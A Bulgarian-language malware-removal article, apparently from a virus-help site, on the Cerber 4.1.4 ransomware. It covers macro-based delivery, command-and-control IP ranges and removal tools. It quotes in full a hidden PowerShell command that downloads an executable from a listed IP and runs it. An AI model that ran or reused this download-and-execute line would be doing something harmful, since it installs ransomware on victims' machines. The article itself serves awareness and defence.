Към съдържанието
  • Активна
  • Тежест: Средна
  • Рансъмуер
  • Windows
  • Проверено · ное. 2016

Рансъмуерният вирус Cerber 4.1.4Как да премахнем?

Ръководство за премахване стъпка по стъпка за засегнатите устройства. Следвайте проверената процедура по-долу — повечето читатели я завършват за под 10 минути.

Julie Splinters · Специалист по премахване на зловреден софтуер

Терорът продължава – беше пуснат Cerber 4.1.4

Cerber 4.1.4 е следващата част на кибер кампанията Cerber. Изглежда по-малко от седмица, след като хакерите пуснаха Cerber 4.1.0 и Cerber 4.1.1, са решили, че това не стига и са пуснали следващата версия от серията. Тя продължава да приставя окончания на случаен принцип. Последната версия е откраднала някои неща от рансъмуера Locky, като например начина на активиране. Cerber 4.1.4 пуска Word документ и изисква да бъдат пуснати macro настройките, за да се свали главният изпълним файл. Въпреки това тази техника, която се използва от Locky, вече е широко разисквана сред IT средите. Затова потребителите, които следят трендовете в тези среди могат да избегнат кибер заплахата. Ако малуерът Ви е засегнал въпреки това, няма нужда да се паникьосвате. Първо трябва да премахнете Cerber 4.1.4 от устройството. Използвайте FortectIntego, за да забързате процеса.

Новата версия на рансъмуера продължава да всява ужас по света. С версии 4.1.0 и 4.1.1 започна и да използва тактика, използвайки IP адрес и изпращайки UDP пакети до отдалечения си сървър за контрол. Последното издание използва три IP адреса, 5.55.50.0/27, 192.42.118.0/27, 194.165.16.0/22, за да прехвърля техническа информация към сървъра. Подобна особеност позволява на хакерите да събират по-важна информация за устройствата на жертвата. Ненужно е да казваме, че подобни данни вдъхновяват престъпниците да подобряват стратегиите си още повече.

Cerber 4.1.4 rampages ruthlessly

Главната особеност на новата версия е начинът, по който Cerber 4.1.4 започва атаката си. Въпреки че предните версии разчитат на спам съобщения и фалшиви фактури, за да се внедряват в системите на потребителите, тази версия използва макроси. Когато жертвата отвори получения .doc файл, той вижда MS Word документ, който съдържа стринг от случайни символи и кодове. За щастие последните версии на Word не позволяват макросите по подразбиране. Затова ще бъдете попитани да ги пуснете. След това, когато настройките са променени, рансъмуера Cerber 4.1.4 пуска PowerShell. За секунди се осъществява и активацията. После приключва с надписа:

POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient).DownloadFile(‘http://94.102.58.30/~trevor/winx64.exe’,“$env:APPDATA\winx64.exe“);Start-Process („$env:APPDATA\winx64.exe“)

Както можете да видите подобна команда се извършва с цел сваляне и пускане на главните елементи за изпълнение – win64.exe. В случай че имате 32-битов Windows изпълнимият файл може да е win32.exe. Сега вирусът трябва да постави файла в папката %AppData%, за да постигне пълна функционалност. Както обикновено докато вирусът криптира, можете да забележите Readme.hta файл на работния плот. Когато криптиращият процес завърши картинката на работния плот ще бъде променена на бележка за откуп, която обявява хайджака от Cerber 4.1.4. Като пуска стойността MachineGuid, намираща се в HKLM\Software\Microsoft\Cryptography папката в компютъра на жертвата, генерира случайно окончание. Не си губете времето и преминете към премахването на Cerber 4.1.4.

Особености при разпространение

Вирусът предпочита да използва утвърдената техника за разпостранение – спам мейли. Въпреки че потребителите биват предупреждавани непрекъснато дане отварят фактури, официални писна или полицейски предупреждения, изпратени от неизвестни източници, броят афектирани потребители продължава да е висок. Кибер престъпниците са изгладили техниките си за подлъгване на потребителите. Въпреки това ако видите съобщение, изпратено от офиса на ФБР или данъчна институция, потвърдете изпращача, преди да отворите приставката. Можете да следите за граматически, стилитически или други грешки. Липсата на лого и креденциали на представители може да подскаже че става дума за фалшив имейл.

Възмжно ли е да заличите вируса изцяло?

Когато става дума за премахването на Cerber 4.1.4, препоръчваме да инсталирате надежден софтуер за сигурност. Обновете го след инсталация и започнете сканирането. Анти-спайуерни програми като FortectIntego или MalwarebytesMalwarebytes обикновено премахват Cerber 4.1.4 за няколко минути. Въпреки това ако се надявате освен това да декриптират файловете Ви, може да останете разочаровани. Има други методи, чрез които можете да го направите, въпреки че най-ефективният е чрез бекъп или оригинален декриптор. Във връзка с това прочетете по-нататък, за да се запознаете с предложенията ни за възстановяване на данни. Ако вирусът е заключил екрана или не можете да пуснете обикновени системни функции, използвайте упътванията за това как да си върнете достъпа.

Бъдете първият, който ще коментира

Virusi.bg
Настройки за поверителност

Използваме бисквитки, за да подобрим вашето изживяване и да анализираме трафика. Някои бисквитки позволяват вградено съдържание като видеа и публикации в социални мрежи. Изберете какво разрешавате — може да промените това по всяко време.